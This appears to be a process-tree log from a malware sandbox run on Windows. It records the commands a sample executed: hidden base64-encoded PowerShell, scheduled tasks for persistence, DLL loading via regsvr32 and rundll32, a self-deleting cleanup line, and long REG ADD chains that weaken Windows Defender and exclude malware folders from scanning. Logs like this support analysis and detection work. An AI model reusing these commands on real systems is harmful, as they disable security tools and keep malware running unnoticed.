- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe"C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\xqKmRxyI9yMan9smqcBne3I2.exe"C:\Users\Admin\Pictures\Minor Policy\xqKmRxyI9yMan9smqcBne3I2.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe"C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==5⤵
-
C:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exeC:\Users\Admin\AppData\Local\Temp\Qabnnvplfigzehwmiavailablenature_s.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 480 -p 2832 -ip 28321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4472 -ip 44721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4472 -ip 44721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4472 -ip 44721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 44721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4472 -ip 44721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4472 -ip 44721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4472 -ip 44721⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4472 -ip 44721⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 48628 -ip 486281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 48972 -ip 489721⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\392C.dll1⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\392C.dll2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 48524 -ip 485241⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\410C.exeC:\Users\Admin\AppData\Local\Temp\410C.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4766.exeC:\Users\Admin\AppData\Local\Temp\4766.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4766.exeC:\Users\Admin\AppData\Local\Temp\4766.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\4766.exe"C:\Users\Admin\AppData\Local\Temp\4766.exe" --Admin IsNotAutoStart IsNotTask3⤵
-
C:\Users\Admin\AppData\Local\Temp\4766.exe"C:\Users\Admin\AppData\Local\Temp\4766.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe"C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe"5⤵
-
C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe"C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build2.exe" & del C:\PrograData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build3.exe"C:\Users\Admin\AppData\Local\f06a1658-a166-467e-8c28-703cc9a7c732\build3.exe"5⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\4E2E.exeC:\Users\Admin\AppData\Local\Temp\4E2E.exe1⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C "wmic path win32_VideoController get name"2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C "wmic cpu get name"2⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic cpu get name3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 48524 -ip 485241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 48524 -ip 485241⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48904 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 48904 -ip 489041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 48524 -ip 485241⤵
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\qSLPdIl.exeC:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\qSLPdIl.exe d8 /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCMDmHxGrLJHC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCMDmHxGrLJHC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VnSvEXTIbraTatzTOsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jIUrjTqJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jIUrjTqJU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVCmSimpmwUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVCmSimpmwUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\twylNxKJekDU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\twylNxKJekDU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CEEEIGvNcEpIBnVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CEEEIGvNcEpIBnVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fwhiGQHhSfnZUzkc\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CEEEIGvNcEpIBnVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fwhiGQHhSfnZUzkc /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fwhiGQHhSfnZUzkc /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CEEEIGvNcEpIBnVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRlJRbIUz" /SC once /ST 03:51:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRlJRbIUz"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRlJRbIUz"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HqggdVJZxuzvaULcA" /SC once /ST 03:25:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\TRglGDZ.exe\" Av /site_id 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HqggdVJZxuzvaULcA"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 48524 -ip 485241⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 48524 -ip 485241⤵
-
C:\Users\Admin\AppData\Local\Temp\AC5C.exeC:\Users\Admin\AppData\Local\Temp\AC5C.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 48524 -ip 485241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4472 -ip 44721⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 48524 -ip 485241⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe1⤵
-
